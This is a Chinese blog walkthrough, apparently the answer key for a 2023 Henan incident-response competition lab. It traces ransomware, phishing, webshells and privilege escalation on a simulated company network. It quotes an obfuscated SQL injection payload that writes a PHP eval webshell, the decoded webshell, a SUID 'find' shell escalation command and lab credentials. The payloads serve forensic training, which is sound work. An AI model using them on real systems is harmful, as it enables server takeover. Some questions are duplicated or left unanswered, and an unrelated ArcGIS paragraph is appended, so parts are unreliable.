2023河南应急响应

2023河南应急响应

前景

场景还原了某小型公司在2021-2022年长期遭受黑客攻击的场景,dmz区域有两台服务器对外提供服务,server区域有三台服务器,caiwu区域有1台财务办公电脑,users区域有2台办公电脑,拓扑中有部分主机出现勒索信息并且出现大量陌生后缀名文件,初步判断为感染勒索病毒;对外网站中出现了挂黑页现象,部分对外网站服务器被写入了webshell,部分服务器中被添加了额外的用户,部分linux服务器被提权,部分服务器中被安装了后门程序,部分用户收到了钓鱼邮件并被成功钓鱼。

具体信息如下:

win2016 188.42.224.111

centos7 188.42.224.222 root/com.1234

win2008 188.42.224.100 网站后台用户名密码admin/admin888。

server1 192.168.100.101 root/789.com moon/123456

server2 192.168.100.60 user1/dragon root/123456.com

server3 192.168.100.100 root/com.1234

财务 172.10.10.200

员工1 192.168.8.100

员工2 192.168.8.200

除上述提供用户名密码的电脑外,其他电脑都为windows电脑,可以直接进入桌面,故不提供用户和密码。

在拓扑中的“外网用户”电脑桌面提供了dmz区域的Centos7被攻击时的流量包,其余攻击痕迹请进入各电脑终端进行分析和查证。

请根据接下来的问题进行应急分析并作答。

1.Centos7被攻击的网站域名是什么?

答案:www.beecms.com

从源IP188.42.224.128访问目标IP 188.42.224.222,可以看到host地址为www.beecms.com。

image-20240508143551748

2.攻击Centos7的黑客IP是什么?

答案:188.42.224.128

在241877行中,源IP 188.42.224.128访问目标IP 188.42.224.222 ,可以看到进行了联合查询的语句。

image-20240508143638352

3. 黑客向Centos7上传了一句话木马文件名是什么(如xxxxxxx.php需加文件后缀)

答案:shell.php

在402771行数据包中,黑客在用户名上使用了联合查询并写入了一句话“admin’ uni union on selselectect 0x3C3F70687020406576616C28245F504F53545B636D645D293B3F3E,2,3,4,5 ‘’ in into outoutfilefile ‘/var/www/html/shell.php’ --%20”

image-20240508143709625

可将“3C3F70687020406576616C28245F504F53545B636D645D293B3F3E”使用notepad++自带的插件进行转换为ascii码。

image-20240508143739662

转换后为“<?php @eval($_POST[cmd]);?>”,为php一句话木马,并写入了/var/www/html/shell.php,转换后的内容如下。

image-20240508143749246

4. 黑客使用什么方式对Centos7进行提权(请选择suid提权 脏牛提权 sudo提权 git提权 内核提权)

答案:suid提权

使用过滤命令“ip.addr eq 188.42.224.222 and tcp.port eq 4444”。

在540806行数据包可以看到黑客使用命令whoami。

image-20240508143830430

在540807行数据包可以看到回显为Apache。

image-20240508143838722

在552217行数据包可以看到黑客使用命令“find . -exec /bin/sh -p ; -quit”。

image-20240508143854154

再次看到黑客使用命令whoami。

image-20240508143903333

在552719行数据包可以看到回显内容为root,则表示为提权成功。

image-20240508143911496

在上面分析的任意条目上右键选择追随流->tcp流。

image-20240508143920005

可以看到黑客使用4444端口的后门执行的完整命令信息。

image-20240508143927991

5. 财务系统有被攻击的迹象,相关目录都出现了被勒索的文件,该勒索病毒名字是什么?(xx.xx)

答:Ransoware.exe

在program files下面发现了Debug目录,下面有一些secretAES加密的敏感字眼。

6. 财务系统有被攻击的迹象,相关目录都出现了被勒索的文件,请问勒索病毒勒索文件后生成的后缀名是什么?

答:adr

在D:/bm目录下发现一堆乱码被加密的文件,该后缀名是adr,无法正常打开。

image-20240508144117428

7. server区域有一台计算机存在软件未授权访问漏洞,被黑客利用后写入了ssh秘钥,该黑客写入的秘钥的主机名称是什么?

答案:kali

在server1中的root/.ssh目录中的authorized_keys文件中。

image-20240508144158282

8. 黑客利用低权限用户远程登录了Server区域中有一台机器,并利用机器中自带的程序进行了提权,这个程序的名称是什么?

答案:find

在server2机器在/home/user1目录中查看.bash_history文件。

9. User区域的某个员工电脑收到了两封邮件钓鱼邮件,钓鱼邮件的邮箱地址什么?

mrzhuangdada@21cn.com

image-20240508144237414

10. User区域两封钓鱼邮件之一使用一个了压缩包进行攻击,攻击者利用的是什么漏洞?(目录穿越漏洞、远程代码执行漏洞、winrar解压漏洞、注入攻击漏洞)

答:目录穿越漏洞

“第三季度业绩表.rar”这个压缩包,是目录穿越漏洞,原因是低版本的winrar。WinRAR < 5.70 Beta 1。

image-20240508144258271

11. User区域两封钓鱼邮件之一使用一个了压缩包进行攻击,压缩包在哪个目录下生成了后门文件?(绝对路径)

答:C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

image-20240508144316218

12. User区域两封钓鱼邮件之一使用一个了压缩包进行攻击,压缩包生成的后门程序的文件名是什么?

image-20240508144327019

13. User区域两封钓鱼邮件之一使用一个了压缩包进行攻击,压缩包生成的后门程序访问的ip地址是什么?

172.16.12.139

一个了压缩包进行攻击,压缩包生成的后门程序的文件名是什么?

[外链图片转存中…(img-GqLjIecR-1715150670797)]

13. User区域两封钓鱼邮件之一使用一个了压缩包进行攻击,压缩包生成的后门程序访问的ip地址是什么?

172.16.12.139

image-20240508144343766

  • 14
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 3
    评论
ArcGIS是一种广泛应用于地理空间数据分析、地图制作和空间模型建立的软件。而河南区域图则指的是使用ArcGIS制作的展示河南省辖区范围以及各种地理要素的地图。 ArcGIS软件提供了丰富的地理数据处理功能,可以将各种数据集导入其中,并进行分析和处理。在制作河南区域图时,首先需要获得河南省的边界数据,可以是矢量多边形数据或栅格数据。然后,可以将其他地理要素数据,如道路、河流、湖泊、行政边界、城市等,与河南省的边界数据叠加在一起。 使用ArcGIS的编辑功能,可以对河南区域图进行编辑和修改。例如,可以对道路进行添加、删除或调整;对河流和湖泊进行绘制和编辑;对城市进行标注和符号化等。同时,还可以进行空间分析,如缓冲区分析、路径分析、热力图分析等,以便更好地理解和解释河南省内的地理现象和空间关系。 除了制作静态的河南区域图外,ArcGIS还支持动态地图的制作和发布。可以将制作好的河南区域图发布为Web地图,供使用者在互联网上进行浏览、查询和交互操作。这样,人们就能通过网络接触到最新、最全面的河南区域地理信息。 总之,ArcGIS软件是制作河南区域图的有力工具,它提供了丰富的数据处理、编辑和分析功能,可以帮助我们更好地了解、展示和传播河南省的地理信息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

lu-fe1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值